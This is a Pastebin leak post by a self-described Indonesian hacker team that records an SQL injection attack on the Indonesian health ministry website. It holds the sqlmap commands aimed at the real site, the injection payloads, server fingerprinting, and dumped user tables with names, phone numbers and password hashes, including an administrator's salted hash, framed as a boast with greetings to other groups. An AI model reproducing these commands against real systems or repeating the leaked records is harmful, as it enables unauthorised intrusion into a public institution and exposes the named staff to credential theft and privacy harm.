RussX9

Depkes.go.id

Aug 23rd, 2014
494
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.43 KB | None | 0 0
  1. [-----------------------]
  2. #Leaked By : RussX9
  3. # FB : https://www.facebook.com/405forbiden
  4. #Indonesian Hacker Cyber team
  5. # YunoGasai | Dr.1n73ction | 404_Proxy | Larva_ROOT | Dandi Dot ID | FR_Dot_Id | Killuax404 | X-GHOST404 | TRUTH404 | Mr.Al404 |3xpl01t1n6 | Bl4ckUmbrell4_404 | umar dot id | Dzikri Dot ID | Haxor_Dd05 | riko_sinkadorable
  6. [-]-----------------------[+]
  7.  
  8. [+]==================[+]
  9. Greatz To : Indonesian BLACKHATS CYBER TEAM , Odong-Odong UNDERGROUND , Mauritania Hacker Team
  10. Root@Greatz#~ > ./Na-Z ./Sickpeoples ./SvN_Nevermore ./Mr.ApaPedulimu ./Anzi007 ./Mr.SaputraAttackerXX ./D22 ./Sakinah ./cybercrows ./RkeNz_007 ./MoXat ./BL4CK_GHOST
  11. [+]==================[+]
  12.  
  13. root@localhost:~# sqlmap -u http://Depkes.go.id/article.php?id=sensor --dbs
  14. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  15. http://sqlmap.org
  16.  
  17. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  18.  
  19. [*] starting at 02:47:03
  20.  
  21. [02:47:03] [INFO] resuming back-end DBMS 'mysql'
  22. [02:47:03] [INFO] testing connection to the target URL
  23. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  24. ---
  25. Place: GET
  26. Parameter: id
  27. Type: boolean-based blind
  28. Title: AND boolean-based blind - WHERE or HAVING clause
  29. Payload: id=332' AND 6287=6287 AND 'Akdb'='Akdb
  30.  
  31. Type: UNION query
  32. Title: MySQL UNION query (NULL) - 8 columns
  33. Payload: id=332' UNION ALL SELECT NULL,CONCAT(0x7167757071,0x754670726e627345537a,0x7162756571),NULL,NULL,NULL,NULL,NULL,NULL#
  34. ---
  35. [02:47:05] [INFO] the back-end DBMS is MySQL
  36. web server operating system: Linux Debian 6.0 (squeeze)
  37. web application technology: PHP 5.3.3, Apache 2.2.16
  38. back-end DBMS: MySQL 5
  39. [02:47:05] [INFO] fetching database names
  40. available databases [3]:
  41. [*] information_schema
  42. [*] portal
  43. [*] project_newgosid
  44. root@localhost:~# sqlmap -u http://depkes.go.id/article.php?id=sensor -D Portal -T ant_sys_user --dump
  45.  
  46. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  47. http://sqlmap.org
  48.  
  49. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  50.  
  51. [*] starting at 02:49:44
  52.  
  53. [02:49:44] [INFO] resuming back-end DBMS 'mysql'
  54. [02:49:44] [INFO] testing connection to the target URL
  55. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  56. ---
  57. Place: GET
  58. Parameter: id
  59. Type: boolean-based blind
  60. Title: AND boolean-based blind - WHERE or HAVING clause
  61. Payload: id=332' AND 6287=6287 AND 'Akdb'='Akdb
  62.  
  63. Type: UNION query
  64. Title: MySQL UNION query (NULL) - 8 columns
  65. Payload: id=332' UNION ALL SELECT NULL,CONCAT(0x7167757071,0x754670726e627345537a,0x7162756571),NULL,NULL,NULL,NULL,NULL,NULL#
  66. ---
  67. [02:49:46] [INFO] the back-end DBMS is MySQL
  68. web server operating system: Linux Debian 6.0 (squeeze)
  69. web application technology: PHP 5.3.3, Apache 2.2.16
  70. back-end DBMS: MySQL 5
  71. [02:49:46] [INFO] fetching tables for database: 'Portal'
  72. Database: portal
  73. Table: ants_sys_user
  74. [4 entries]
  75. +------------------------+--------------+----------------+-----------+----------------------------------+
  76. | email_address | phone_number | user_full_name | user_name | user_password |
  77. +------------------------+--------------+----------------+-----------+----------------------------------+
  78. | [email protected] | 085717389000 | Suwanto | Suwanto | ebbf35aaa36fc8caf5f810aa83fa49e3 |
  79. | [email protected] | 08129516082 | nuning | nuning | 14e50d9f59d66f5e4a5e8e134973bf1a |
  80. | unknown | unknown | ismail | ismail | edd13a0018ac0d2e71f827125b1b3532 |
  81. | [email protected] | 08128512730 | istiqomah | isti | 42a1e5c0481df236f8774677b2b65188 |
  82. +------------------------+--------------+----------------+-----------+----------------------------------+
  83.  
  84. [02:49:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.depkes.go.id'
  85.  
  86. [*] shutting down at 02:49:46
  87. root@localhost:~# sqlmap -u http://depkes.go.id/article.php?id=sensor -D Portal -t joy_users --Dump
  88.  
  89. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  90. http://sqlmap.org
  91.  
  92. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  93.  
  94. [*] starting at 02:49:44
  95.  
  96. [02:49:44] [INFO] resuming back-end DBMS 'mysql'
  97. [02:49:44] [INFO] testing connection to the target URL
  98. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  99. ---
  100. Place: GET
  101. Parameter: id
  102. Type: boolean-based blind
  103. Title: AND boolean-based blind - WHERE or HAVING clause
  104. Payload: id=332' AND 6287=6287 AND 'Akdb'='Akdb
  105.  
  106. Type: UNION query
  107. Title: MySQL UNION query (NULL) - 1 columns
  108. Payload: id=332' UNION ALL SELECT NULL,CONCAT(0x7167757071,0x754670726e627345537a,0x7162756571),NULL,NULL,NULL,NULL,NULL,NULL#
  109. ---
  110. [02:49:46] [INFO] the back-end DBMS is MySQL
  111. web server operating system: Linux Debian 6.0 (squeeze)
  112. web application technology: PHP 5.3.3, Apache 2.2.16
  113. back-end DBMS: MySQL 5
  114. [02:49:46] [INFO] fetching tables for database: 'Portal'
  115. Database: portal
  116. Table: jos_users
  117. [1 entry]
  118. +--------------------+-------------------------------------------------------------------+----------+
  119. | email | password | username |
  120. +--------------------+-------------------------------------------------------------------+----------+
  121. | [email protected] | 35d1b3c70e13825c0d4a67843adbf6ef:sQEMDKp8NKGSLMMKP5DocOSMwO1uCV3l | admin |
  122. +--------------------+-------------------------------------------------------------------+----------+
  123. [*] Shuting Down At : 02:59:12
  124.  
  125. Root@Localhost#~
Advertisement
Add Comment
Please, Sign In to add comment